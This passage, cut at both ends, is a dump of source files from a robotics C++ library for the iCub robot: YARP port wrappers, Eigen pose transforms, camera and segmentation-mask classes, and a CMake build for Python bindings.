"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/SpatialVelocityBuffer.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\n\n\nSpatialVelocityBuffer::SpatialVelocityBuffer()\n{\n twist_.resize(6);\n}\n\nSpatialVelocityBuffer::~SpatialVelocityBuffer()\n{}\n\n\nbool SpatialVelocityBuffer::freeze(const bool blocking)\n{\n return true;\n}\n\n\nvoid SpatialVelocityBuffer::set_twist(const Eigen::Vector3d& linear_velocity, const Eigen::Vector3d& angular_velocity, const double& elapsed_time)\n{\n twist_.head<3>() = linear_velocity;\n twist_.segment<3>(3) = angular_velocity;\n elapsed_time_ = elapsed_time;\n}\n\n\ndouble SpatialVelocityBuffer::elapsed_time()\n{\n return elapsed_time_;\n}\n\n\nEigen::VectorXd SpatialVelocityBuffer::twist()\n{\n return twist_;\n}\n"
},
{
"alpha_fraction": 0.7033132314682007,
"alphanum_fraction": 0.7123494148254395,
"avg_line_length": 19.75,
"blob_id": "5a5b5387d64c580642e779eabeb55ab045d714bb",
"content_id": "cc89cf1db2c1cf8059925fe79bf517ebbf936c90",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 664,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 32,
"path": "/src/RobotsIO/include/RobotsIO/Utils/FloatMatrix.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_FLOATMATRIX_H\n#define ROBOTSIO_FLOATMATRIX_H\n\n#include <Eigen/Dense>\n\n#include <RobotsIO/Utils/DataStream.h>\n\nnamespace RobotsIO {\n namespace Utils {\n class FloatMatrix;\n }\n}\n\n\nclass RobotsIO::Utils::FloatMatrix : public RobotsIO::Utils::DataStream\n{\npublic:\n virtual ~FloatMatrix();\n\n virtual Eigen::MatrixXf matrix() = 0;\n\n virtual Eigen::MatrixXd matrix_as_double();\n};\n\n#endif /* ROBOTSIO_FLOATMATRIX_H */\n"
},
{
"alpha_fraction": 0.7070645689964294,
"alphanum_fraction": 0.7119366526603699,
"avg_line_length": 28.321428298950195,
"blob_id": "ef71f694781c456aeace66efca1016354a5e2146",
"content_id": "d873a82fbe4223c71c4ff8a867fdbf6c44606277",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1642,
"license_type": "permissive",
"max_line_length": 156,
"num_lines": 56,
"path": "/src/RobotsIO/src/Utils/TransformYarpTransformClient.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/TransformYarpTransformClient.h>\n\n#include <yarp/eigen/Eigen.h>\n#include <yarp/os/Property.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\nusing namespace yarp::eigen;\n\n\nTransformYarpTransformClient::TransformYarpTransformClient(const std::string& port_prefix, const std::string& source_name, const std::string& target_name) :\n source_name_(source_name),\n target_name_(target_name)\n{\n /* FrameTransformClient initialization. */\n yarp::os::Property tf_properties;\n tf_properties.put(\"device\", \"transformClient\");\n tf_properties.put(\"local\", \"/\" + port_prefix + \"/transform_client\");\n tf_properties.put(\"remote\", \"/transformServer\");\n\n bool ok = drv_transform_client_.open(tf_properties);\n ok &= (drv_transform_client_.view(transform_client_) && (transform_client_ != nullptr));\n if (!ok)\n {\n throw(std::runtime_error(log_name_ + \"::ctor. Error: cannot initialize the FrameTransformClient.\"));\n }\n}\n\n\nTransformYarpTransformClient:: ~TransformYarpTransformClient()\n{}\n\n\nEigen::Transform<double, 3, Affine> TransformYarpTransformClient::transform()\n{\n return transform_;\n}\n\n\nbool TransformYarpTransformClient::freeze(const bool blocking)\n{\n yarp::sig::Matrix transform(4, 4);\n if (!transform_client_->getTransform(target_name_, source_name_, transform))\n return false;\n\n transform_.matrix() = toEigen(transform);\n\n return true;\n}\n"
},
{
"alpha_fraction": 0.6424925923347473,
"alphanum_fraction": 0.6532366275787354,
"avg_line_length": 27.41984748840332,
"blob_id": "43fb12c86e9b2b514bf2ee9ca2e6de079c423153",
"content_id": "8a3d01a97bdb6cc7226314d25a6e2ebf6e0c8df9",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3723,
"license_type": "permissive",
"max_line_length": 164,
"num_lines": 131,
"path": "/src/RobotsIO/src/Utils/TransformYarpPort.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/TransformYarpPort.h>\n\n#include <opencv2/core/eigen.hpp>\n\n#include <yarp/cv/Cv.h>\n#include <yarp/eigen/Eigen.h>\n#include <yarp/sig/Vector.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\nusing namespace yarp::cv;\nusing namespace yarp::eigen;\nusing namespace yarp::sig;\n\n\nTransformYarpPort::TransformYarpPort(const std::string& port_prefix, const bool& provide_rgb, const bool& provide_depth_segmentation) :\n YarpBufferedPort<yarp::sig::Vector>(port_prefix + \"/transform:i\"),\n rgb_out_(port_prefix + \"/rgb:o\"),\n depth_segmentation_out_(port_prefix + \"/depth_segmentation:o\"),\n provide_rgb_(provide_rgb),\n provide_depth_segmentation_(provide_depth_segmentation)\n{}\n\n\nTransformYarpPort:: ~TransformYarpPort()\n{}\n\n\nEigen::Transform<double, 3, Affine> TransformYarpPort::transform()\n{\n return transform_;\n}\n\n\nEigen::MatrixXd TransformYarpPort::bounding_box()\n{\n return bbox_points_;\n}\n\n\nbool TransformYarpPort::freeze(const bool blocking)\n{\n yarp::sig::Vector* data_yarp = receive_data(blocking);\n transform_received_ = (data_yarp != nullptr);\n\n if (!transform_received_)\n return false;\n\n bool invalid_pose = true;\n for (std::size_t i = 0; i < 7; i++)\n invalid_pose &= ((*data_yarp)(i) == 0.0);\n if (invalid_pose)\n return false;\n\n transform_ = Translation<double, 3>(toEigen(*data_yarp).head<3>());\n AngleAxisd rotation((*data_yarp)(6), toEigen(*data_yarp).segment<3>(3));\n transform_.rotate(rotation);\n\n // FIXME: this might be moved somewhere else.\n if (data_yarp->size() > 7)\n {\n int offset;\n /* Check if this stream is also carrying object velocities. */\n if (data_yarp->size() == (7 + 6 + 8 * 3))\n offset = 7 + 6;\n else if (data_yarp->size() == (7 + 8 * 3))\n offset = 7;\n else\n throw(std::runtime_error(log_name_ + \"::freeze(). Error: the data stream carries a wrong number of items\"));\n\n Eigen::VectorXd bbox_points_data = toEigen(*data_yarp).segment<24>(offset);\n bbox_points_.resize(3, 8);\n for (std::size_t i = 0; i < 8; i++)\n bbox_points_.col(i) = bbox_points_data.segment<3>(3 * i);\n }\n\n return true;\n}\n\n\nint TransformYarpPort::get_frames_between_iterations() const\n{\n return -1;\n}\n\n\nvoid TransformYarpPort::set_rgb_image(const cv::Mat& image)\n{\n if (!provide_rgb_)\n return;\n\n cv_rgb_out_ = image.clone();\n yarp_rgb_out_ = yarp::cv::fromCvMat<yarp::sig::PixelRgb>(cv_rgb_out_);\n\n rgb_out_.send_data(yarp_rgb_out_);\n}\n\n\nvoid TransformYarpPort::set_depth_segmentation_image(const Eigen::MatrixXf& depth, const cv::Mat& segmentation)\n{\n if (!provide_depth_segmentation_)\n return;\n\n cv::Mat depth_temp;\n cv::eigen2cv(depth, depth_temp);\n cv_depth_out_ = depth_temp.clone();\n\n // cv_depth_out_ = cv::Mat(depth.rows(), depth.cols(), CV_32FC1);\n // Eigen::Map<Eigen::Matrix<float, Eigen::Dynamic, Eigen::Dynamic, Eigen::RowMajor>> cv_depth_out_eigen(cv_depth_out_.ptr<float>(), depth.rows(), depth.cols());\n // cv_depth_out_eigen = depth;\n\n cv_segmentation_out_ = segmentation.clone();\n\n yarp_depth_segmentation_out_.image_mono = yarp::cv::fromCvMat<PixelMono>(cv_segmentation_out_);\n yarp_depth_segmentation_out_.image_float = yarp::cv::fromCvMat<PixelFloat>(cv_depth_out_);\n\n depth_segmentation_out_.send_data(yarp_depth_segmentation_out_);\n}\n\n\nbool TransformYarpPort::transform_received()\n{\n return transform_received_;\n}\n"
},
{
"alpha_fraction": 0.7053872346878052,
"alphanum_fraction": 0.7095959782600403,
"avg_line_length": 23.244897842407227,
"blob_id": "1f13ea86f0ed919d0f73b8737195153fce48ac69",
"content_id": "c6129f37df76fd4770d00cec61ac01ab646a83c8",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1188,
"license_type": "permissive",
"max_line_length": 98,
"num_lines": 49,
"path": "/src/RobotsIO/include/RobotsIO/Utils/SpatialVelocityYarpPort.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_SPATIALVELOCITYYARPVECTOR_H\n#define ROBOTSIO_SPATIALVELOCITYYARPVECTOR_H\n\n#include <RobotsIO/Utils/SpatialVelocity.h>\n#include <RobotsIO/Utils/YarpVectorOfProbe.hpp>\n\n#include <Eigen/Dense>\n\n#include <chrono>\n\nnamespace RobotsIO {\n namespace Utils {\n class SpatialVelocityYarpPort;\n }\n}\n\nclass RobotsIO::Utils::SpatialVelocityYarpPort : public RobotsIO::Utils::SpatialVelocity,\n public RobotsIO::Utils::YarpVectorOfProbe<double>\n{\npublic:\n SpatialVelocityYarpPort(const std::string& port_name);\n\n virtual ~SpatialVelocityYarpPort();\n\n bool freeze(const bool blocking = false) override;\n\n double elapsed_time() override;\n\nprotected:\n Eigen::VectorXd twist() override;\n\nprivate:\n std::chrono::steady_clock::time_point last_time_;\n\n double elapsed_time_;\n\n bool last_time_initialized_ = false;\n\n Eigen::VectorXd twist_;\n};\n\n#endif /* ROBOTSIO_SPATIALVELOCITYYARPVECTOR_H */\n"
},
{
"alpha_fraction": 0.6952381134033203,
"alphanum_fraction": 0.6978836059570312,
"avg_line_length": 21.77108383178711,
"blob_id": "71694aad5e5180d814421b75e04d4fc7093af37f",
"content_id": "351662ae3e7fac019428de12c465310fd550e53c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1890,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 83,
"path": "/src/RobotsIO/include/RobotsIO/Utils/YarpBottleProbe.hpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_YARPBOTTLEPROBE_H\n#define ROBOTSIO_YARPBOTTLEPROBE_H\n\n#include <RobotsIO/Utils/Parameters.h>\n#include <RobotsIO/Utils/Probe.h>\n#include <RobotsIO/Utils/YarpBufferedPort.hpp>\n\n#include <yarp/os/Bottle.h>\n\n#include <string>\n\nnamespace RobotsIO {\n namespace Utils {\n template <class T = yarp::os::Bottle>\n class YarpBottleProbe;\n }\n}\n\n\ntemplate <class T>\nclass RobotsIO::Utils::YarpBottleProbe : public RobotsIO::Utils::YarpBufferedPort<yarp::os::Bottle>,\n public RobotsIO::Utils::Probe\n{\npublic:\n YarpBottleProbe(const std::string& port_name);\n\n virtual ~YarpBottleProbe();\n\nprotected:\n void on_new_data() override;\n\nprivate:\n yarp::os::Bottle convert_from(const T& data);\n\n yarp::os::Bottle data_;\n\n const std::string log_name_ = \"YarpBottleProbe\";\n};\n\n\ntemplate <class T>\nRobotsIO::Utils::YarpBottleProbe<T>::YarpBottleProbe(const std::string& port_name) :\n YarpBufferedPort<yarp::os::Bottle>(port_name)\n{}\n\n\ntemplate <class T>\nRobotsIO::Utils::YarpBottleProbe<T>::~YarpBottleProbe()\n{}\n\n\ntemplate <class T>\nvoid RobotsIO::Utils::YarpBottleProbe<T>::on_new_data()\n{\n data_ = convert_from(RobotsIO::Utils::any_cast<T>(get_data()));\n\n this->send_data(data_);\n}\n\n\ntemplate <class T>\nyarp::os::Bottle RobotsIO::Utils::YarpBottleProbe<T>::convert_from(const T& data)\n{\n return data;\n}\n\n\ntemplate <>\nvoid RobotsIO::Utils::YarpBottleProbe<RobotsIO::Utils::Parameters>::on_new_data();\n\n\ntemplate <>\nyarp::os::Bottle RobotsIO::Utils::YarpBottleProbe<RobotsIO::Utils::Parameters>::convert_from(const RobotsIO::Utils::Parameters& data);\n\n\n#endif /* ROBOTSIO_YARPBOTTLEPROBE_H */\n"
},
{
"alpha_fraction": 0.6713567972183228,
"alphanum_fraction": 0.6743718385696411,
"avg_line_length": 20.868131637573242,
"blob_id": "bd547e2c6497435ba33e166dc30b937f96936ebf",
"content_id": "13d069bbd294cc37e24c336d9d47e3f285bd11ef",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1990,
"license_type": "permissive",
"max_line_length": 101,
"num_lines": 91,
"path": "/src/RobotsIO/src/Utils/SegmentationYarpPort.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2021 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/SegmentationYarpPort.h>\n\n#include <yarp/cv/Cv.h>\n\nusing namespace RobotsIO::Utils;\nusing namespace yarp::cv;\nusing namespace yarp::sig;\n\n\nSegmentationYarpPort::SegmentationYarpPort(const std::string& port_prefix, const bool& provide_rgb) :\n segmentation_in_(port_prefix + \"/segmentation:i\"),\n rgb_out_(port_prefix + \"/rgb:o\"),\n provide_rgb_(provide_rgb)\n{}\n\n\nSegmentationYarpPort::~SegmentationYarpPort()\n{}\n\n\nbool SegmentationYarpPort::reset()\n{\n segmentation_in_.flush();\n\n return true;\n}\n\n\nbool SegmentationYarpPort::is_stepping_required() const\n{\n return false;\n}\n\n\nint SegmentationYarpPort::get_frames_between_iterations() const\n{\n return -1;\n}\n\n\nstd::pair<bool, cv::Mat> SegmentationYarpPort::segmentation(const bool& blocking)\n{\n ImageOf<PixelMono>* yarp_mask = segmentation_in_.receive_data(blocking);\n\n if (yarp_mask == nullptr)\n {\n cv_mask_in_ = cv::Mat();\n return std::make_pair(false, cv::Mat());\n }\n\n yarp_mask_in_.copy(*yarp_mask);\n cv_mask_in_ = toCvMat(yarp_mask_in_);\n time_stamp_mask_in_ = segmentation_in_.time_stamp();\n\n return std::make_pair(true, cv_mask_in_);\n}\n\n\nstd::pair<bool, cv::Mat> SegmentationYarpPort::latest_segmentation()\n{\n if (cv_mask_in_.empty())\n return std::make_pair(false, cv::Mat());\n\n return std::make_pair(true, cv_mask_in_);\n}\n\n\ndouble SegmentationYarpPort::get_time_stamp()\n{\n return time_stamp_mask_in_;\n}\n\n\nvoid SegmentationYarpPort::set_rgb_image(const cv::Mat& image, const double& timestamp)\n{\n if (!provide_rgb_)\n return;\n\n cv_rgb_out_ = image.clone();\n yarp_rgb_out_ = yarp::cv::fromCvMat<yarp::sig::PixelRgb>(cv_rgb_out_);\n\n rgb_out_.set_time_stamp(timestamp);\n rgb_out_.send_data(yarp_rgb_out_);\n}\n"
},
{
"alpha_fraction": 0.6382870078086853,
"alphanum_fraction": 0.6530716419219971,
"avg_line_length": 32.52991485595703,
"blob_id": "33b3ca304814c905baa96d6349797b4b7f819207",
"content_id": "c0589e993d075eb8c6ff0fcdabfd75e633515297",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3923,
"license_type": "permissive",
"max_line_length": 152,
"num_lines": 117,
"path": "/src/RobotsIO/src/Camera/SegmentationCamera.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Camera/SegmentationCamera.h>\n#include <RobotsIO/Camera/CameraParameters.h>\n\n#include <Eigen/Dense>\n\nusing namespace RobotsIO::Camera;\nusing namespace Eigen;\n\n\nSegmentationCamera::SegmentationCamera(const CameraParameters& camera_parameters, const std::string& object_mesh_path, const double& threshold) :\n parameters_(camera_parameters),\n threshold_(threshold)\n{\n /* Configure renderer. */\n SICAD::ModelPathContainer model;\n model[\"object\"] = object_mesh_path;\n renderer_ = std::unique_ptr<SICAD>\n (\n new SICAD(model, parameters_.width(), parameters_.height(), parameters_.fx(), parameters_.fy(), parameters_.cx(), parameters_.cy(), 1)\n );\n renderer_->setOglToCam({1.0, 0.0, 0.0, static_cast<float>(M_PI)});\n}\n\n\nSegmentationCamera::~SegmentationCamera()\n{}\n\n\nstd::pair<bool, cv::Mat> SegmentationCamera::mask(const MatrixXf& scene_depth, const Transform<double, 3, Affine> object_transform)\n{\n return render_mask(scene_depth, object_transform);\n}\n\n\nstd::pair<bool, cv::Mat> SegmentationCamera::mask(std::shared_ptr<Camera> camera, std::shared_ptr<RobotsIO::Utils::Transform> object_transform)\n{\n /* Get object pose. */\n if (!object_transform->freeze(true))\n {\n std::cout << log_name_ << \"::mask. Error: cannot get object pose.\" << std::endl;\n return std::make_pair(false, cv::Mat());\n }\n Transform<double, 3, Affine> transform = object_transform->transform();\n\n /* Get camera depth. */\n bool valid_depth = false;\n Eigen::MatrixXf depth;\n std::tie(valid_depth, depth) = camera->depth(true);\n if (!valid_depth)\n {\n std::cout << log_name_ << \"::mask. Error: cannot get depth.\" << std::endl;\n return std::make_pair(false, cv::Mat());\n }\n\n return render_mask(depth, transform);\n}\n\nstd::pair<bool, cv::Mat> SegmentationCamera::render_mask(const Eigen::MatrixXf& scene_depth, const Eigen::Transform<double, 3, Affine> object_transform)\n{\n /* Compose pose for renderer. */\n SICAD::ModelPose pose;\n pose.push_back(object_transform.translation()(0));\n pose.push_back(object_transform.translation()(1));\n pose.push_back(object_transform.translation()(2));\n\n AngleAxisd rotation(object_transform.rotation());\n Vector3d axis = rotation.axis();\n pose.push_back(axis(0));\n pose.push_back(axis(1));\n pose.push_back(axis(2));\n pose.push_back(rotation.angle());\n\n SICAD::ModelPoseContainer pose_container;\n pose_container.emplace(\"object\", pose);\n\n /* Placeholders */\n cv::Mat placeholder;\n double cam_x [4] = {0.0, 0.0, 0.0};\n double cam_o [4] = {1.0, 0.0, 0.0, 0.0};\n\n /* Render depth. */\n cv::Mat rendered_depth;\n if (!(renderer_->superimpose(pose_container, cam_x, cam_o, placeholder, rendered_depth)))\n {\n std::cout << log_name_ << \"::render_mask. Error: cannot render depth.\" << std::endl;\n return std::make_pair(false, cv::Mat());\n }\n\n /* Use depth to produce a rendered segmentation mask. */\n cv::Mat mask;\n#if CV_MAJOR_VERSION >= 4\n cv::threshold(rendered_depth, mask, 0.001, 255, cv::THRESH_BINARY);\n#else\n cv::threshold(rendered_depth, mask, 0.001, 255, CV_THRESH_BINARY);\n#endif\n mask.convertTo(mask, CV_8UC1);\n\n /* Remove pixels that are not coherent with the depth of the entire scene. */\n cv::Mat non_zero_coordinates;\n findNonZero(mask, non_zero_coordinates);\n for (std::size_t i = 0; i < non_zero_coordinates.total(); i++)\n {\n const cv::Point& p = non_zero_coordinates.at<cv::Point>(i);\n\n if (std::abs(scene_depth(p.y, p.x) - rendered_depth.at<float>(p)) > threshold_)\n mask.at<uchar>(p) = 0.0;\n }\n\n return std::make_pair(true, mask);\n}\n"
},
{
"alpha_fraction": 0.6699212789535522,
"alphanum_fraction": 0.6740157604217529,
"avg_line_length": 25.906780242919922,
"blob_id": "a56ba27f0c00a73731c56f7b4b1b6202d55f6c59",
"content_id": "a957b1baddafbf028d53d0d4c86f1469b1f5f829",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3175,
"license_type": "permissive",
"max_line_length": 134,
"num_lines": 118,
"path": "/src/RobotsIO/src/Camera/iCubCameraRelative.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Camera/iCubCameraRelative.h>\n\nusing namespace RobotsIO::Camera;\n\n\niCubCameraRelative::iCubCameraRelative\n(\n const std::string& robot_name,\n const std::string& port_prefix,\n const bool& use_calibration,\n const std::string& calibration_path\n) :\n iCubCamera(robot_name, \"right\", port_prefix + \"_relative_right\", use_calibration, calibration_path)\n{\n /* Initialize left camera. */\n left_camera_= std::unique_ptr<iCubCamera>\n (\n new iCubCamera(robot_name, \"left\", port_prefix + \"_relative_left\")\n );\n}\n\n\niCubCameraRelative::iCubCameraRelative\n(\n const std::string& data_path_left,\n const std::string& data_path_right,\n const std::size_t& width,\n const std::size_t& height,\n const double& fx_l,\n const double& cx_l,\n const double& fy_l,\n const double& cy_l,\n const double& fx_r,\n const double& cx_r,\n const double& fy_r,\n const double& cy_r,\n const bool& load_encoders_data,\n const bool& use_calibration,\n const std::string& calibration_path\n) :\n iCubCamera(data_path_right, \"right\", width, height, fx_r, cx_r, fy_r, cy_r, load_encoders_data, use_calibration, calibration_path)\n{\n /* Initialize left camera. */\n left_camera_= std::unique_ptr<iCubCamera>\n (\n new iCubCamera(data_path_left, \"left\", width, height, fx_l, cx_l, fy_l, cy_l, load_encoders_data)\n );\n}\n\n\niCubCameraRelative::~iCubCameraRelative()\n{}\n\n\nbool iCubCameraRelative::status() const\n{\n return iCubCamera::status() && get_relative_camera().status();\n}\n\n\nbool iCubCameraRelative::step_frame()\n{\n bool ok = iCubCamera::step_frame();\n ok &= left_camera_->step_frame();\n\n return ok;\n}\n\n\nbool iCubCameraRelative::set_frame_index(const std::int32_t& index)\n{\n bool ok = iCubCamera::set_frame_index(index);\n\n ok &= left_camera_->set_frame_index(index);\n\n return ok;\n}\n\n\nRobotsIO::Camera::iCubCamera& iCubCameraRelative::get_relative_camera()\n{\n return *left_camera_;\n}\n\n\nconst RobotsIO::Camera::iCubCamera& iCubCameraRelative::get_relative_camera() const\n{\n return *left_camera_;\n}\n\n\nstd::pair<bool, Eigen::Transform<double, 3, Eigen::Affine>> iCubCameraRelative::pose(const bool& blocking)\n{\n bool valid_left = false;\n Eigen::Transform<double, 3, Eigen::Affine> pose_left;\n std::tie(valid_left, pose_left) = get_relative_camera().pose(false);\n if (!valid_left)\n return std::make_pair(false, Eigen::Transform<double, 3, Eigen::Affine>());\n\n bool valid_right = false;\n Eigen::Transform<double, 3, Eigen::Affine> pose_right;\n std::tie(valid_right, pose_right) = iCubCamera::pose(false);\n if (!valid_right)\n return std::make_pair(false, Eigen::Transform<double, 3, Eigen::Affine>());\n\n /* Evaluate the relative pose from left camera to right camera . */\n Eigen::Transform<double, 3, Eigen::Affine> pose_relative;\n pose_relative = pose_left.inverse() * pose_right;\n\n return std::make_pair(true, pose_relative);\n}\n"
},
{
"alpha_fraction": 0.707739531993866,
"alphanum_fraction": 0.7169480323791504,
"avg_line_length": 39.00877380371094,
"blob_id": "872df1d21a19cdcd6a38e8d5beecd9c685d0b528",
"content_id": "30b73cacf77b891eab633e5803613192d87be6ee",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 4561,
"license_type": "permissive",
"max_line_length": 175,
"num_lines": 114,
"path": "/python/CMakeLists.txt",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "#===============================================================================\n#\n# Copyright (C) 2022 Istituto Italiano di Tecnologia (IIT)\n#\n# This software may be modified and distributed under the terms of the\n# BSD 3-Clause license. See the accompanying LICENSE file for details.\n#\n#===============================================================================\n\ncmake_minimum_required(VERSION 3.5)\n\nproject(robotsio)\n\nlist(APPEND CMAKE_MODULE_PATH ${CMAKE_CURRENT_SOURCE_DIR}/cmake)\n\n# Build shared libs and set PIC on\nset(BUILD_SHARED_LIBS ON)\nset(CMAKE_POSITION_INDEPENDENT_CODE ON)\n\n# RobotsIO\nfind_package(RobotsIO REQUIRED)\n\n# Python\nfind_package(Python3 REQUIRED COMPONENTS Interpreter Development REQUIRED)\n\n# YARP\nfind_package(YARP REQUIRED)\nforeach(_component conf os sig dev)\n get_property(YARP_${_component}_INCLUDE_DIRS TARGET YARP::YARP_${_component} PROPERTY INTERFACE_INCLUDE_DIRECTORIES)\n include_directories(${YARP_${_component}_INCLUDE_DIRS})\nendforeach()\ninclude_directories(${YARP_BINDINGS})\ninclude_directories(/usr/local/include)\n\n# SWIG\nfind_package(SWIG 4.0 REQUIRED)\ninclude(${SWIG_USE_FILE})\n\n# Configure SWIG\nset(SWIG_BINDINGS_SOURCE_FILE robots-io-python-types.i)\nset_source_files_properties(${SWIG_BINDINGS_SOURCE_FILE} PROPERTIES CPLUSPLUS ON)\nset(CMAKE_SWIG_OUTDIR \"${CMAKE_BINARY_DIR}/lib/python3\")\nset(CMAKE_SWIG_FLAGS \"-py3;-O;-threads\")\n\n# Create SWIG library\nswig_add_library(robotsio\n LANGUAGE python\n SOURCES ${SWIG_BINDINGS_SOURCE_FILE})\n\n# Link libraries\nswig_link_libraries(robotsio Python3::Python YARP::YARP_os YARP::YARP_sig YARP::YARP_dev RobotsIO::RobotsIO)\n\n# Include directories\ntarget_include_directories(${SWIG_MODULE_robotsio_REAL_NAME} BEFORE PRIVATE ${Python3_INCLUDE_DIRS})\n\n# Target properties\nset_target_properties(${SWIG_MODULE_robotsio_REAL_NAME}\n PROPERTIES OUTPUT_NAME \"_robotsio\"\n LIBRARY_OUTPUT_DIRECTORY \"${CMAKE_BINARY_DIR}/lib/python3\"\n # treat Python3_INCLUDE_DIRS as non-system so that it can be overriden\n NO_SYSTEM_FROM_IMPORTED TRUE)\n\n# Installation\nexecute_process(\n COMMAND ${Python3_EXECUTABLE} -c \"from distutils import sysconfig; print(sysconfig.get_python_lib())\"\n OUTPUT_VARIABLE Python3_INSTDIR\n OUTPUT_STRIP_TRAILING_WHITESPACE\n)\n\nset(_CMAKE_INSTALL_PYTHON3DIR \"${Python3_INSTDIR}\")\nset(CMAKE_INSTALL_PYTHON3DIR ${_CMAKE_INSTALL_PYTHON3DIR} CACHE PATH \"python3 bindings (${_CMAKE_INSTALL_PYTHON3DIR})\")\nmark_as_advanced(CMAKE_INSTALL_PYTHON3DIR)\nif(NOT IS_ABSOLUTE ${CMAKE_INSTALL_PYTHON3DIR})\n set(CMAKE_INSTALL_FULL_PYTHON3DIR \"${CMAKE_INSTALL_PREFIX}/${CMAKE_INSTALL_PYTHON3DIR}\")\nelse()\n set(CMAKE_INSTALL_FULL_PYTHON3DIR \"${CMAKE_INSTALL_PYTHON3DIR}\")\nendif()\n\ninstall(FILES ${CMAKE_BINARY_DIR}/lib/python3/robotsio.py\n DESTINATION ${CMAKE_INSTALL_PYTHON3DIR})\n\nif(NOT CMAKE_SKIP_RPATH AND NOT CMAKE_SKIP_INSTALL_RPATH)\n file(RELATIVE_PATH _rel_path \"${CMAKE_INSTALL_FULL_PYTHON3DIR}\" \"${CMAKE_INSTALL_FULL_LIBDIR}\")\n get_target_property(_current_rpath ${SWIG_MODULE_robotsio_REAL_NAME} INSTALL_RPATH)\n if (${CMAKE_SYSTEM_NAME} MATCHES \"Darwin\")\n list(APPEND _current_rpath \"@loader_path/${_rel_path}\")\n else()\n list(APPEND _current_rpath \"\\$ORIGIN/${_rel_path}\")\n endif()\n set_target_properties(${SWIG_MODULE_robotsio_REAL_NAME} PROPERTIES INSTALL_RPATH \"${_current_rpath}\")\nendif()\n\ninstall(\n TARGETS ${SWIG_MODULE_robotsio_REAL_NAME}\n DESTINATION ${CMAKE_INSTALL_PYTHON3DIR}\n)\n\noption(ROBOTSIO_PYTHON_PIP_METADATA_INSTALL \"Use CMake to install Python pip metadata. Set to false if some other tool installs it.\" TRUE)\nmark_as_advanced(ROBOTSIO_PYTHON_PIP_METADATA_INSTALL)\nset(ROBOTSIO_PYTHON_PIP_METADATA_INSTALLER \"cmake\" CACHE STRING \"Specify the string to identify the pip Installer. Default: cmake, change this if you are using another tool.\")\nmark_as_advanced(ROBOTSIO_PYTHON_PIP_METADATA_INSTALLER)\nif(ROBOTSIO_PYTHON_PIP_METADATA_INSTALL)\n file(WRITE ${CMAKE_CURRENT_BINARY_DIR}/METADATA \"\")\n file(APPEND ${CMAKE_CURRENT_BINARY_DIR}/METADATA \"Metadata-Version: 2.1\\n\")\n file(APPEND ${CMAKE_CURRENT_BINARY_DIR}/METADATA \"Name: robotsio\\n\")\n file(APPEND ${CMAKE_CURRENT_BINARY_DIR}/METADATA \"Version: 0.0.100\\n\")\n file(WRITE 